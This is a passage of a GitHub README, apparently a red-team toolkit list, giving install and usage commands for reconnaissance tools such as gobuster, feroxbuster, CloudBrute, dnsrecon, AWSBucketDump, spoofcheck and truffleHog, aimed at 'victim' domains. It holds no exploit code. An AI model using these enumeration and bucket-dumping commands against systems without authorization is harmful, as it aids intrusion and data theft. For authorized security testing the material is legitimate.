viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">certSniff is a Certificate Transparency logs keyword watcher I wrote in Python. It uses the certstream library to watch for certificate creation logs that contain keywords, defined in a file.</p> <p dir="auto">You can set this running with several keywords relating to your victim domain, any certificate creations will be recorded and may lead to the discovery of domains you were previously unaware of.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt"><pre>git clone https://github.com/A-poc/certSniff<span class="pl-k">;</span><span class="pl-c1">cd</span> certSniff/<span class="pl-k">;</span>pip install -r requirements.txt</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 certSniff.py -f example.txt"><pre><span class="pl-s1">python3</span> <span class="pl-s1">certSniff</span>.<span class="pl-c1">py</span> <span class="pl-c1">-</span><span class="pl-s1">f</span> <span class="pl-s1">example</span>.<span class="pl-c1">txt</span></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/223851512-068261fa-7070-4307-852c-7ef46d938b18.png"><img src="https://user-images.githubusercontent.com/100603074/223851512-068261fa-7070-4307-852c-7ef46d938b18.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://www.kali.org/tools/gobuster/" rel="nofollow">gobuster</a></h3><a id="user-content-gobuster" class="anchor" aria-label="Permalink: 🔙gobuster" href="#gobuster"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Nice tool for brute forcing file/folder paths on a victim website.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt install gobuster"><pre>sudo apt install gobuster</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20"><pre>gobuster dir -u <span class="pl-s"><span class="pl-pds">"</span>https://google.com<span class="pl-pds">"</span></span> -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/192146594-86f04a85-fce3-4c4c-bcd6-2bf6a6222241.png"><img src="https://user-images.githubusercontent.com/100603074/192146594-86f04a85-fce3-4c4c-bcd6-2bf6a6222241.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/epi052/feroxbuster">feroxbuster</a></h3><a id="user-content-feroxbuster" class="anchor" aria-label="Permalink: 🔙feroxbuster" href="#feroxbuster"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A tool designed to perform Forced Browsing, an attack where the aim is to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker.</p> <p dir="auto">Feroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, etc...</p> <p dir="auto"><strong>Install: (Kali)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt update && sudo apt install -y feroxbuster"><pre>sudo apt update <span class="pl-k">&&</span> sudo apt install -y feroxbuster</pre></div> <p dir="auto"><strong>Install: (Mac)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash"><pre>curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh <span class="pl-k">|</span> bash</pre></div> <p dir="auto"><strong>Install: (Windows)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip Expand-Archive .\feroxbuster.zip .\feroxbuster\feroxbuster.exe -V"><pre>Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip Expand-Archive .<span class="pl-cce">\f</span>eroxbuster.zip .<span class="pl-cce">\f</span>eroxbuster<span class="pl-cce">\f</span>eroxbuster.exe -V</pre></div> <p dir="auto">For full installation instructions see <a href="https://epi052.github.io/feroxbuster-docs/docs/installation/" rel="nofollow">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url ./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx # Scan with headers ./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}" # Read URLs from stdin cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files # Proxy requests through burpsuite ./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080"><pre><span class="pl-c"><span class="pl-c">#</span> Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url</span> ./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx <span class="pl-c"><span class="pl-c">#</span> Scan with headers</span> ./feroxbuster -u http://127.1 -H Accept:application/json <span class="pl-s"><span class="pl-pds">"</span>Authorization: Bearer {token}<span class="pl-pds">"</span></span> <span class="pl-c"><span class="pl-c">#</span> Read URLs from stdin</span> cat targets <span class="pl-k">|</span> ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js <span class="pl-k">|</span> fff -s 200 -o js-files <span class="pl-c"><span class="pl-c">#</span> Proxy requests through burpsuite</span> ./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080</pre></div> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="Full usage examples can be found [here](https://epi052.github.io/feroxbuster-docs/docs/examples/)."><pre class="notranslate"><code>Full usage examples can be found [here](https://epi052.github.io/feroxbuster-docs/docs/examples/). </code></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/216729079-7a80f942-a692-4e91-8ffc-7d91d8d69d21.png"><img src="https://user-images.githubusercontent.com/100603074/216729079-7a80f942-a692-4e91-8ffc-7d91d8d69d21.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif" rel="nofollow">https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/0xsha/CloudBrute">CloudBrute</a></h3><a id="user-content-cloudbrute" class="anchor" aria-label="Permalink: 🔙CloudBrute" href="#cloudbrute"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).</p> <p dir="auto">Features:</p> <ul dir="auto"> <li>Cloud detection (IPINFO API and Source Code)</li> <li>Fast (concurrent)</li> <li>Cross Platform (windows, linux, mac)</li> <li>User-Agent Randomization</li> <li>Proxy Randomization (HTTP, Socks5)</li> </ul> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">Download the latest <a href="https://github.com/0xsha/CloudBrute/releases">release</a> for your system and follow the usage.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt' CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt" # Output results to file CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt"><pre><span class="pl-c"><span class="pl-c">#</span> Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'</span> CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w <span class="pl-s"><span class="pl-pds">"</span>./data/storage_small.txt<span class="pl-pds">"</span></span> <span class="pl-c"><span class="pl-c">#</span> Output results to file</span> CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/216729172-5d58d005-85a8-49f2-8968-98b459961f81.png"><img src="https://user-images.githubusercontent.com/100603074/216729172-5d58d005-85a8-49f2-8968-98b459961f81.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/0xsha/CloudBrute">https://github.com/0xsha/CloudBrute</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://www.kali.org/tools/dnsrecon/#dnsrecon" rel="nofollow">dnsrecon</a></h3><a id="user-content-dnsrecon" class="anchor" aria-label="Permalink: 🔙dnsrecon" href="#dnsrecon"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">dnsrecon is a pyhton tool for enumerating DNS records (MX, SOA, NS, A, AAAA, SPF and TXT) and can provide a number of new associated victim hosts to pivot into from a single domain search.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt install dnsrecon"><pre>sudo apt install dnsrecon</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="dnsrecon -d google.com"><pre>dnsrecon -d google.com</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/191689049-624db340-8adb-4a97-be8d-b7177f409a8b.png"><img src="https://user-images.githubusercontent.com/100603074/191689049-624db340-8adb-4a97-be8d-b7177f409a8b.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://www.shodan.io/dashboard" rel="nofollow">shodan.io</a></h3><a id="user-content-shodanio" class="anchor" aria-label="Permalink: 🔙shodan.io" href="#shodanio"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Shodan crawls public infrastructure and displays it in a searchable format. Using a company name, domain name, IP address it is possible to discover potentially vulnerable systems relating to your target via shodan.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/191689282-70f99fe9-aa08-4cd3-b881-764eface8546.png"><img src="https://user-images.githubusercontent.com/100603074/191689282-70f99fe9-aa08-4cd3-b881-764eface8546.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/D3Ext/AORT">AORT</a></h3><a id="user-content-aort" class="anchor" aria-label="Permalink: 🔙AORT" href="#aort"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Tool for enumerating subdomains, enumerating DNS, WAF detection, WHOIS, port scan, wayback machine, email harvesting.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt"><pre>git clone https://github.com/D3Ext/AORT<span class="pl-k">;</span> <span class="pl-c1">cd</span> AORT<span class="pl-k">;</span> pip3 install -r requirements.txt</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 AORT.py -d google.com"><pre><span class="pl-s1">python3</span> <span class="pl-c1">AORT</span>.<span class="pl-c1">py</span> <span class="pl-c1">-</span><span class="pl-s1">d</span> <span class="pl-s1">google</span>.<span class="pl-c1">com</span></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/192070398-aae0217d-69c4-460b-ae4c-51b045551268.png"><img src="https://user-images.githubusercontent.com/100603074/192070398-aae0217d-69c4-460b-ae4c-51b045551268.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/BishopFox/spoofcheck">spoofcheck</a></h3><a id="user-content-spoofcheck" class="anchor" aria-label="Permalink: 🔙spoofcheck" href="#spoofcheck"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. Additionally it will alert if the domain has DMARC configuration that sends mail or HTTP requests on failed SPF/DKIM emails.</p> <p dir="auto">Domains are spoofable if any of the following conditions are met:</p> <ul dir="auto"> <li>Lack of an SPF or DMARC record</li> <li>SPF record never specifies <code>~all</code> or <code>-all</code></li> <li>DMARC policy is set to <code>p=none</code> or is nonexistent</li> </ul> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt"><pre>git clone https://github.com/BishopFox/spoofcheck<span class="pl-k">;</span> <span class="pl-c1">cd</span> spoofcheck<span class="pl-k">;</span> pip install -r requirements.txt</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="./spoofcheck.py [DOMAIN]"><pre>./spoofcheck.py [DOMAIN]</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/208209744-dfff6dd6-f53c-41a2-b3b7-bfc6bfb9b521.png"><img src="https://user-images.githubusercontent.com/100603074/208209744-dfff6dd6-f53c-41a2-b3b7-bfc6bfb9b521.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/jordanpotti/AWSBucketDump">AWSBucketDump</a></h3><a id="user-content-awsbucketdump" class="anchor" aria-label="Permalink: 🔙AWSBucketDump" href="#awsbucketdump"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for interesting files. It's similar to a subdomain bruteforcer but is made specifically for S3 buckets and also has some extra features that allow you to grep for files, as well as download interesting files.</p> <p dir="auto"><strong>Install:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt"><pre class="notranslate"><code>git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE] optional arguments: -h, --help show this help message and exit -D Download files. This requires significant diskspace -d If set to 1 or True, create directories for each host w/ results -t THREADS number of threads -l HOSTLIST -g GREPWORDS Provide a wordlist to grep for -m MAXSIZE Maximum file size to download. python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1"><pre class="notranslate"><code>usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE] optional arguments: -h, --help show this help message and exit -D Download files. This requires significant diskspace -d If set to 1 or True, create directories for each host w/ results -t THREADS number of threads -l HOSTLIST -g GREPWORDS Provide a wordlist to grep for -m MAXSIZE Maximum file size to download. python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1 </code></pre></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/metac0rtex/GitHarvester">GitHarvester</a></h3><a id="user-content-githarvester" class="anchor" aria-label="Permalink: 🔙GitHarvester" href="#githarvester"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Nice tool for finding information from GitHub with regex, with the ability to search specific GitHub users and/or projects.</p> <p dir="auto"><strong>Install:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester"><pre class="notranslate"><code>git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="./githarvester.py"><pre class="notranslate"><code>./githarvester.py </code></pre></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/dxa4481/truffleHog">truffleHog</a></h3><a id="user-content-trufflehog" class="anchor" aria-label="Permalink: 🔙truffleHog" href="#trufflehog"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">TruffleHog is a tool that scans git repositories and looks for high-entropy strings and patterns that may indicate the presence of secrets, such as passwords and API keys. With TruffleHog, you can quickly and easily find sensitive information that may have been accidentally committed and pushed to a repository.</p> <p dir="auto"><strong>Install (Binaries):</strong> <a href="https://github.com/trufflesecurity/trufflehog/releases">Link</a></p> <p dir="auto"><strong>Install (Go):</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install"><pre class="notranslate"><code>git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="trufflehog https://github.com/trufflesecurity/test_keys"><pre class="notranslate"><code>trufflehog https://github.com/trufflesecurity/test_keys </code></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/208212273-137cb6ef-b0e6-42f7-8fd3-ac6a5cfe6a40.png"><img src="https://user-images.githubusercontent.com/100603074/208212273-137cb6ef-b0e6-42f7-8fd3-ac6a5cfe6a40.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/zhzyker/dismap">Dismap</a></h3><a id="user-content-dismap" class="anchor" aria-label="Permalink: 🔙Dismap" href="#dismap"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 